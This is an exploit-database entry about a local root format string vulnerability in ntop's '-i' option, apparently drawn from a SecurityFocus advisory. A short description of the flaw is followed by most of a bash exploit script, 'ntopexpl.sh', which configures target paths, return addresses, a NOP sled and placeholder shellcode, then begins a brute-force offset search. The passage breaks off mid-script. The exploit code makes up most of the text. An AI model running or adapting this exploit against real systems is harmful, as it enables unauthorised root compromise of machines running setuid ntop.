source: https://www.securityfocus.com/bid/1840/info ntop (network top) is a unix program used for displaying network usage statistics. It is often installed setuid root because it uses privileged ports. ntop is vulnerable to a format string vulnerability that can compromise root access locally. If present, the argument to the "-i" command-line option is passed directly to a *printf function without being checked. It is thus possible for an attacker insert format specifiers that will be interpreted by the *printf function. Malicious format specifiers can cause the function to overwrite memory locations on the program's stack with user supplied data. This can lead to execution of arbitrary code with the effective privileges of the process (if setuid root, superuser privs). ########################## ntopexpl.sh ########################## #!/bin/bash # CONFIGURATION: umask 000 target="/usr/sbin/ntop" tmpdir="/tmp/" # address we want to write to (ret on the stack) # has to be an absolute address but we brute force # this scanning 64 addresses from writeadr on writeadr="0xbffff000" # no. of addresses to scan wrep=64 # address of the shell in our string # must point somewhere to our 'nop' region shadr="0xbffff320" # number of nops before shellcode declare -i nnops nnops=128 echo echo "-------------------------------------------" echo "| ntop local r00t exploit |" echo "| by IhaQueR |" echo "| only for demonstrative purposes |" echo "-------------------------------------------" echo echo echo "configured for running $target" echo "RETADR = $writeadr" echo "SHELL = $shadr" echo "NOPS = $nnops" echo # fake shellcode shellfake="SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS" # number of nops before shellcode declare -i nnops nnops=128 # make nop field declare -i idx idx=0 nfake="" while test $idx -lt $nnops; do nfake="N$nfake" idx=$(($idx+1)) done; # sanity check :-) if ! test -x $target ; then echo "[-] $target not found or not executable, sorry" exit 1 fi; echo "[+] found $target" declare -i cnt declare -i cntmax cnt=0 cntmax=1024 # make string used for offset search # like